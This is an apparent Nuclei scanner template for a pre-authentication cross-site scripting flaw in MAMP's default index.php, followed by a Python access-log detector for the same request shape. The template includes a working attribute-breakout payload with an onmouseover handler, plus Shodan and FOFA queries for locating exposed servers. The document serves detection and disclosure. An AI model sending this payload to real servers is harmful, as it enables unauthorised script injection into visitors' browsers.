A Cross-Site Scripting (XSS) vulnerability exists in the default installation of MAMP server. The file `/Applications/MAMP/htdocs/index.php` is susceptible to malicious input, allowing attackers to inject JavaScript code that executes in the context of the victim's browser. This vulnerability can be exploited without prior authentication.
PoC code [public]
id: mamp-server-xss

info:
  name: MAMP Server - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    A Cross-Site Scripting (XSS) vulnerability exists in the default installation of MAMP server. The file `/Applications/MAMP/htdocs/index.php` is susceptible to malicious input, allowing attackers to inject JavaScript code that executes in the context of the victim's browser. This vulnerability can be exploited without prior authentication.
  impact: |
    Exploiting this vulnerability can allow attackers to execute arbitrary JavaScript in the victim's browser.
  remediation: |
    Implement input validation and output encoding to sanitize user inputs. Apply the vendor-supplied patch or upgrade MAMP to a version where the vulnerability is resolved.
  reference:
    - https://octagon.net/blog/2022/01/26/mamp-server-preauth-xss-leading-to-host-compromise-0day/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"MAMP"
    fofa-query: title="MAMP"
  tags: mamp,server,xss,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/index.php/test"%20onmouseover="alert(document.domain);"%20style="font-size:100000px;background-color:white";'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'MAMP'
          - 'test" onmouseover="alert(document.domain);" style'
        condition: and

      - type: word
        part: content_type
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210087ad55f3f9ee933294ec767150d08702ff336bd1e75adc8ca1e6a176532f63b602210082b03f68e60a19b495e8cae10d24afc040a39fe3386748ed649da802af56ceaa:922c64590222798bb761d5b6d8e72950
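
For defenders reviewing web-server logs, the following added example (not part of the template above or of MAMP's code) flags requests whose path info after a `.php` script closes an HTML attribute and introduces an event handler, which is the request shape the template sends. The combined access-log format is an assumption, the function names are hypothetical, and the log lines are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# Request line of a common/combined-format access-log entry (assumed format).
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Path info is whatever follows the script name: /index.php/<path info>.
PATH_INFO_RE = re.compile(r"^(?P<script>.*?\.php)(?P<info>/.*)$", re.IGNORECASE)
# A quote or angle bracket, plus an event handler, style attribute or script tag.
BREAKOUT_RE = re.compile(r"""["'<>]""")
HANDLER_RE = re.compile(r"\bon[a-z]+\s*=|\bstyle\s*=|<\s*script", re.IGNORECASE)

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(log_line):
    """Return script and decoded path info for a suspicious request, else None."""
    request = REQUEST_RE.search(log_line)
    if not request:
        return None
    path = decode_fully(urlsplit(request.group("target")).path)
    match = PATH_INFO_RE.match(path)
    if not match:
        return None
    info = match.group("info")
    if BREAKOUT_RE.search(info) and HANDLER_RE.search(info):
        return {"script": match.group("script"), "path_info": info}
    return None

def scan(lines):
    """Classify every line and keep only the findings."""
    return [finding for finding in map(classify, lines) if finding]

# Constructed sample entries (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Jan/2022:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5012',
    '203.0.113.7 - - [26/Jan/2022:10:00:05 +0000] "GET /index.php/docs/o%27brien HTTP/1.1" 200 5012',
    '198.51.100.9 - - [26/Jan/2022:10:01:10 +0000] "GET /index.php/test%22%20onmouseover=%22alert(document.domain);%22 HTTP/1.1" 200 5230',
    '198.51.100.9 - - [26/Jan/2022:10:01:12 +0000] "GET /index.php/x%2522%2520onfocus%253D%2522y HTTP/1.1" 200 5198',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit shows that such a request was received, not that the payload was reflected; access logs carry no response body, so confirming reflection still needs the body check the template's matchers perform.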